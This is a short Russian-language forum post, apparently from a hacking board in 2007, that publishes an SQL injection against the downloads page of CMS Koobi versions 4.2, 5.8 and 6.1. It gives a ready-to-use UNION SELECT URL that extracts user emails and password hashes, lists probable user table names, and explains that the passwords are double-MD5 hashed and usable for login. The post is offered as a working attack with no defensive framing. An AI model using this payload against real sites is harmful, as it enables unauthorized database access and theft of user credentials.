28.08.2007, 12:37
|
|
Постоянный
Регистрация: 31.07.2002
Сообщений: 312
Провел на форуме:
1212427
Репутация:
187
|
|
SQL-инъекция в CMS Koobi
CMS Koobi v4.2 v5.8 v6.1 со страницей скачки файлов
возможно другие версии(тестировал только на этих)
http://site/index.php?area=1&p=downloads&categ=-1+union+select+1,concat(email,0x3a,pass),3+from+table_name/*
Наиболее вероятные зачения table_name:
Код:
koobi4_user
kpro_user
kpro5_user
kpro6_user
для авторизации нужны email и пароль
Пароль - дважды хэшированный md5: md5(md5($pass))
|
|
|